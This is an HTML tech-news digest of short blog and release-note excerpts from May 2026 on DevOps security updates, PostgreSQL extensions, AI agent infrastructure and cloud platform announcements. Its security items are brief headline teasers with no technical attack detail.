<h3 id="h3-modernizing-devops-security-with-intelligent-kyc-enforcement-layers" class="group relative scroll-mt-24">
        <a href="#h3-modernizing-devops-security-with-intelligent-kyc-enforcement-layers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modernizing DevOps Security With Intelligent KYC Enforcement Layers
        </a>
        </h3><p>This is where smart KYC enforcement layers fit in — not a compliance box, but an engineering control that is directly part of DevOps processes.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/modernizing-devops-security-with-intelligent-kyc-enforcement-layers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-teamcity-2025115-is-out" class="group relative scroll-mt-24">
        <a href="#h3-teamcity-2025115-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TeamCity 2025.11.5 Is Out
        </a>
        </h3><p>Our (most likely) final update for TeamCity 2025.11 On-Premises servers has just been released. This update addresses a tiny amount of issues, but includes four security problem fixes, so we recommend</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/05/teamcity-2025-11-5-bug-fix/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-snyk-announces-anthropic-updates-evo-integrates-with-claude-enterprise-and-snyk-desk-comes-to-claude-desktop" class="group relative scroll-mt-24">
        <a href="#h3-snyk-announces-anthropic-updates-evo-integrates-with-claude-enterprise-and-snyk-desk-comes-to-claude-desktop" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Snyk announces Anthropic updates: Evo integrates with Claude Enterprise, and Snyk Desk comes to Claude Desktop
        </a>
        </h3><p>Snyk announces two new integrations with Anthropic that cover both sides of AI-assisted development. Evo by Snyk now integrates with Anthropic&#39;s Claude Enterprise, and the Snyk Security Desktop Extens</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/claude-enterprise-integration-desktop-expansion/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-claude-compliance-api-support-with-cloudflare-casb" class="group relative scroll-mt-24">
        <a href="#h3-announcing-claude-compliance-api-support-with-cloudflare-casb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing Claude Compliance API support with Cloudflare CASB
        </a>
        </h3><p>Cloudflare now integrates with the Claude Compliance API, so that security teams can monitor Claude Enterprise activity directly in the Cloudflare Dashboard.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/casb-anthropic-integration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pintheft-linux-kernel-vulnerability-mitigation" class="group relative scroll-mt-24">
        <a href="#h3-pintheft-linux-kernel-vulnerability-mitigation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PinTheft Linux kernel vulnerability mitigation
        </a>
        </h3><p>A local privilege escalation (LPE) security vulnerability in the Linux kernel, codename “PinTheft,” was publicly disclosed on May 19, 2026. The vulnerability was fixed in the mainline Linux kernel tre</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/pintheft-linux-kernel-vulnerability-mitigation"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-the-ai-revolution-how-snyk-and-our-partners-are-scaling-for-the-future" class="group relative scroll-mt-24">
        <a href="#h3-securing-the-ai-revolution-how-snyk-and-our-partners-are-scaling-for-the-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing The AI Revolution: How Snyk And Our Partners Are Scaling For The Future
        </a>
        </h3><p>AI is accelerating code creation. Learn how Snyk is scaling its AI Security Platform and investing in new partner programs to help enterprises govern AI-generated code at scale.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/securing-ai-revolution-snyk-partners/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitea-1262-is-released" class="group relative scroll-mt-24">
        <a href="#h3-gitea-1262-is-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gitea 1.26.2 is released
        </a>
        </h3><p>We are excited to announce the release of Gitea 1.26.2! We strongly recommend all users upgrade to this version, as it contains a number of security fixes alongside important bug fixes and stability i</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Gitea Blog</strong></p>
<p><a href="https://blog.gitea.com/release-of-1.26.2"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18" class="group relative scroll-mt-24">
        <a href="#h3-pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_tre 1.1.1 released -- an approximate-REGEX index AM for PostgreSQL 18+
        </a>
        </h3><p>I am pleased to announce the first public release of <a href="https://codeberg.org/gregburd/pg_tre">pg_tre</a>, a native PostgreSQL 18+ index access method for approximate-regex matching. pg_tre indexes text co</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18-3305/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_infer-100-released-transformer-model-knowledge-as-sql-relations" class="group relative scroll-mt-24">
        <a href="#h3-pg_infer-100-released-transformer-model-knowledge-as-sql-relations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_infer 1.0.0 released -- transformer model knowledge as SQL relations
        </a>
        </h3><p>I am pleased to announce the first public release of pg_infer, a PostgreSQL 18+ extension that exposes the internals of small transformer language models -- gate activations, feature labels, learned a</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_infer-100-released-transformer-model-knowledge-as-sql-relations-3307/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql" class="group relative scroll-mt-24">
        <a href="#h3-pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_mentat 1.3.0 released -- Datomic-compatible Datalog inside PostgreSQL
        </a>
        </h3><p>I am pleased to announce the first public release of <a href="https://github.com/gburd/pg_mentat">pg_mentat</a>, a PostgreSQL extension that implements Datomic&#39;s data model -- immutable facts (datoms), schema-f</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql-3306/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nosql-storm-stop-fighting-the-mongodb" class="group relative scroll-mt-24">
        <a href="#h3-the-nosql-storm-stop-fighting-the-mongodb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The NoSQL Storm - Stop fighting the MongoDB
        </a>
        </h3><p>The NoSQL Storm, a Database DevOps comic inspired by MongoDB, exploring NoSQL scaling, schema evolution, and modern DevOps practices.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/database-devops-comic-volume-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgday-israel-2026-call-for-papers-is-now-open" class="group relative scroll-mt-24">
        <a href="#h3-pgday-israel-2026-call-for-papers-is-now-open" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PGDay Israel 2026 - Call for Papers is Now Open
        </a>
        </h3><p>Dear PostgreSQL Community, We are pleased to announce that the Call for Papers for PGDay Israel 2026 is now open. We invite community members, users, and developers to submit proposals for talks and p</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgday-israel-2026-call-for-papers-is-now-open-3291/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-long-horizon-tasks-building-agents-that-work-over-hours-days" class="group relative scroll-mt-24">
        <a href="#h3-long-horizon-tasks-building-agents-that-work-over-hours-days" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Long-horizon tasks: building agents that work over hours & days
        </a>
        </h3><p>Early AI agents handled one-shot jobs that took a few minutes: fix this bug, write this function, generate this test. More recent workflows are multi-step, tool-using, and stateful over extended sessi</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/long-horizon-ai-agents-memory-state-infrastructure/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-benchmarking-ai-coding-agents-for-distributed-sql-what-we-learned" class="group relative scroll-mt-24">
        <a href="#h3-benchmarking-ai-coding-agents-for-distributed-sql-what-we-learned" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Benchmarking AI Coding Agents for Distributed SQL: What We Learned
        </a>
        </h3><p>AI models write vanilla PostgreSQL. If your database is distributed, providing the AI model with a YugabyteDB skill file closes the gap and ensures it writes code that works for your application. In t</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/benchmarking-ai-coding-agents-for-distributed-sql-lessons/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-a-context-engine-the-platform-layer-behind-production-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-what-is-a-context-engine-the-platform-layer-behind-production-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is a context engine? The platform layer behind production AI agents
        </a>
        </h3><p>Count the systems behind your AI agent. A vector database for embeddings. A separate cache for LLM responses. A memory service for conversation state. A pipeline syncing data from Postgres. Probably a</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/what-is-a-context-engine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tidb-scaile-europe-2026-why-engineers-building-agentic-ai-should-be-in-stockholm-on-4-june" class="group relative scroll-mt-24">
        <a href="#h3-tidb-scaile-europe-2026-why-engineers-building-agentic-ai-should-be-in-stockholm-on-4-june" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TiDB SCaiLE Europe 2026: Why Engineers Building Agentic AI Should Be in Stockholm on 4 June
        </a>
        </h3><p>Most teams shipping AI agents in 2026 hit the same wall around the same time. The prototype works. Ten users or even a thousand users mostly work. But then one user action triggers thousands of agent </p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-scaile-europe-2026-why-attend/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-apache-cassandra-performance-tuning-what-we-learned" class="group relative scroll-mt-24">
        <a href="#h3-apache-cassandra-performance-tuning-what-we-learned" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Apache Cassandra Performance Tuning: What We Learned
        </a>
        </h3><p>This blog post (tries to) consolidate what we&#39;ve learned from years of tuning Apache Cassandra for performance</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/19/cassandra-performance-tuning-lessons-learned/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-a-context-layer-ai-agent-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-what-is-a-context-layer-ai-agent-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is a context layer? AI agent infrastructure
        </a>
        </h3><p>In a demo, your agent only has to hold one conversation with one user, against fresh data, for a few minutes. Production is different. It has to remember users across sessions, reconcile retrieved doc</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/what-is-a-context-layer/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-2-phaas-2-furious-the-evolution-of-chinese-language-phishing-services" class="group relative scroll-mt-24">
        <a href="#h3-2-phaas-2-furious-the-evolution-of-chinese-language-phishing-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services
        </a>
        </h3><p>Written by: Jamie Collier. While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-sagemaker-expands-domain-management-across-domain-types" class="group relative scroll-mt-24">
        <a href="#h3-amazon-sagemaker-expands-domain-management-across-domain-types" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SageMaker expands domain management across domain types
        </a>
        </h3><p>Amazon SageMaker Unified Studio now provides domain management experience for Identity Center and IAM-based domains outside of AWS console, allows administrators and data management teams to create an</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/domain-management-iam-idc/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-agentic-migration-assessment-capabilities-now-available-with-aws-transform" class="group relative scroll-mt-24">
        <a href="#h3-new-agentic-migration-assessment-capabilities-now-available-with-aws-transform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New agentic migration assessment capabilities now available with AWS Transform
        </a>
        </h3><p>AWS Transform now offers advanced migration assessment capabilities including what-if scenarios, customizable assumptions, flexible file format support, and multiple new total cost of ownership (TCO) </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/assessment-capabilities-transform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-sagemaker-adds-business-metadata-and-governance-in-iam-based-domains" class="group relative scroll-mt-24">
        <a href="#h3-amazon-sagemaker-adds-business-metadata-and-governance-in-iam-based-domains" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon SageMaker adds business metadata and governance in IAM-based domains
        </a>
        </h3><p>Amazon SageMaker Unified Studio now supports business context, metadata and data governance capabilities in IAM-based domains. With this launch, customers using Amazon SageMaker IAM-based domains can </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/sagemaker-catalog-iam-domains/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-request-based-autoscaling-is-now-generally-available-on-app-platform" class="group relative scroll-mt-24">
        <a href="#h3-request-based-autoscaling-is-now-generally-available-on-app-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Request-Based Autoscaling Is Now Generally Available on App Platform
        </a>
        </h3><p>Traffic doesn’t spike on a schedule. A product launch, a viral moment, or a flash sale can send request volume through the roof in seconds, long before your CPU metrics catch up. That gap is where per</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/request-based-autoscaling-app-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row" class="group relative scroll-mt-24">
        <a href="#h3-github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub recognized as a Leader in the Gartner® Magic Quadrant™ for Enterprise AI Coding Agents for the third year in a row
        </a>
        </h3><p>We are committed to empowering every developer by building an open, secure, and AI-powered platform that defines the future of software development.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/github-recognized-as-a-leader-in-the-gartner-magic-quadrant-for-enterprise-ai-coding-agents-for-the-third-year-in-a-row/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-blueprint-how-movix-fills-a-gap-in-dental-skills-with-specialized-agentic-ai" class="group relative scroll-mt-24">
        <a href="#h3-the-blueprint-how-movix-fills-a-gap-in-dental-skills-with-specialized-agentic-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Blueprint: How Movix fills a gap in dental skills with specialized agentic AI
        </a>
        </h3><p>Welcome to The Blueprint, a regular feature where we highlight how Google Cloud customers are tackling unique and common challenges across industries using the latest AI and cloud technologies. We hop</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/startups/filling-the-gaps-in-dental-skills-with-specialized-agentic-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-canonical-announces-fully-managed-kubeflow-ai-operations-platform-on-the-microsoft-azure-marketplace" class="group relative scroll-mt-24">
        <a href="#h3-canonical-announces-fully-managed-kubeflow-ai-operations-platform-on-the-microsoft-azure-marketplace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Canonical announces fully Managed Kubeflow AI operations platform on the Microsoft Azure Marketplace
        </a>
        </h3><p>Canonical has announced the general availability of Managed Kubeflow on the Microsoft Azure Marketplace. This fully managed MLOps platform allows enterprise AI teams to deploy a production-ready envir</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/managed-kubeflow-microsoft-azure-canonical-release"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1122" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1122" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.122
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.122 (Insiders)</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_122"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-jaeger-hit-86-compression-on-10-million-spans-with-clickhouse" class="group relative scroll-mt-24">
        <a href="#h3-how-jaeger-hit-86-compression-on-10-million-spans-with-clickhouse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Jaeger hit 8.6× compression on 10 million spans with ClickHouse
        </a>
        </h3><p>As someone who’s been maintaining Jaeger, I’ve watched users request ClickHouse support consistently over the past few years. With Jaeger</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/jaeger-clickhouse-storage-backend/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-clickhouse-learned-from-a-year-of-coding-with-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-what-clickhouse-learned-from-a-year-of-coding-with-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What ClickHouse learned from a year of coding with AI agents
        </a>
        </h3><p>Some people will tell you agents will take all our jobs. Others insist they are useless. Leadership at many companies</p>
<p><strong>📅 May 24, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/clickhouse-ai-coding-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openclaw-passed-300000-github-stars-then-google-launched-spark" class="group relative scroll-mt-24">
        <a href="#h3-openclaw-passed-300000-github-stars-then-google-launched-spark" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenClaw passed 300,000 GitHub stars. Then Google launched Spark.
        </a>
        </h3><p>OpenClaw made the always-on agent feel personal by making it live somewhere you could point at — a Mac mini</p>
<p><strong>📅 May 23, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/gemini-spark-vs-openclaw/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-jetbrains-fit-test-is-this-the-right-workplace-for-you" class="group relative scroll-mt-24">
        <a href="#h3-the-jetbrains-fit-test-is-this-the-right-workplace-for-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The JetBrains Fit Test: Is This the Right Workplace for You?
        </a>
        </h3><p>If you’ve ever wondered what it’s really like to work at JetBrains, this post is for you. We could tell you about our products, our offices, or the number of developers who use our tools, but the trut</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/life-at-jetbrains/2026/05/the-jetbrains-fit-test-is-this-the-right-workplace-for-you/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-happens-when-you-give-ai-agents-the-map-of-your-codes-coverage" class="group relative scroll-mt-24">
        <a href="#h3-what-happens-when-you-give-ai-agents-the-map-of-your-codes-coverage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What Happens When You Give AI Agents the Map of Your Code’s Coverage?
        </a>
        </h3><p>When you ask an AI agent to write a new feature, a good agent will eventually say: “I need to write a test for this.” But what happens next is usually messy. To figure out where that new test belongs,</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/05/22/claude-codex-ai-agent-skill-for-writing-tests/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-rider-20262-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements" class="group relative scroll-mt-24">
        <a href="#h3-rider-20262-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Rider 2026.2 EAP 3: Cost-effective Agentic Test Coverage, Code Change Previews, GameDev Templates, and NuGet Improvements
        </a>
        </h3><p>JetBrains Rider 2026.2 EAP 3 is out! You can download this version from our website, update directly from within the IDE, use the free Toolbox App, or install it via snap packages. Here’s what you can</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/05/22/rider-2026-2-eap-3-cost-effective-agentic-test-coverage-code-change-previews-gamedev-templates-and-nuget-improvements/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-decoding-design-how-design-and-engineering-thrive-together-in-open-source" class="group relative scroll-mt-24">
        <a href="#h3-decoding-design-how-design-and-engineering-thrive-together-in-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Decoding design: How design and engineering thrive together in open source
        </a>
        </h3><p>Open source thrives on engineering-driven processes. Fast feedback loops, terminal tools, Git workflows: they’re the lifeblood of how we build software in the open. But for software to truly excel, we</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/decoding-design-how-design-and-engineering-thrive-together-in-open-source"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-may-22-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-may-22-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — May 22, 2026
        </a>
        </h3><p>Fierce Network: Red Hat CTO says these are 3 big things it’s working on with telcos. Verizon took to the keynote stage at Red Hat Summit to talk up its network modernization work with the vendor. Red Ha</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-may-22-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-developing-web-apps-with-local-llm-inference" class="group relative scroll-mt-24">
        <a href="#h3-developing-web-apps-with-local-llm-inference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Developing web apps with local LLM inference
        </a>
        </h3><p>I’ve yet to meet a developer that enjoys working with metered AI APIs. The need to pay for every API call in development works in direct opposition to the ethos of rapid iteration, and it’s easy for t</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/developing-web-apps-with-local-llm-inference"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-even-is-the-harness-in-ai" class="group relative scroll-mt-24">
        <a href="#h3-what-even-is-the-harness-in-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What even is the harness in AI?
        </a>
        </h3><p>I recently saw OpenClaw referred to as a harness. I thought, “That’s interesting. OpenClaw isn’t a harness. It’s an agent runtime—it drives the agent loop.” So, what does the word &quot;harness&quot; even mean?</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/what-even-harness-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hats-approach-to-keyboard-testing-for-web-accessibility" class="group relative scroll-mt-24">
        <a href="#h3-red-hats-approach-to-keyboard-testing-for-web-accessibility" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat's Approach to Keyboard Testing for Web Accessibility
        </a>
        </h3><p>One of the core principles of Red Hat’s open source culture is open exchange, which is the belief that information should be freely available and accessible to anyone. I recently represented Red Hat a</p>
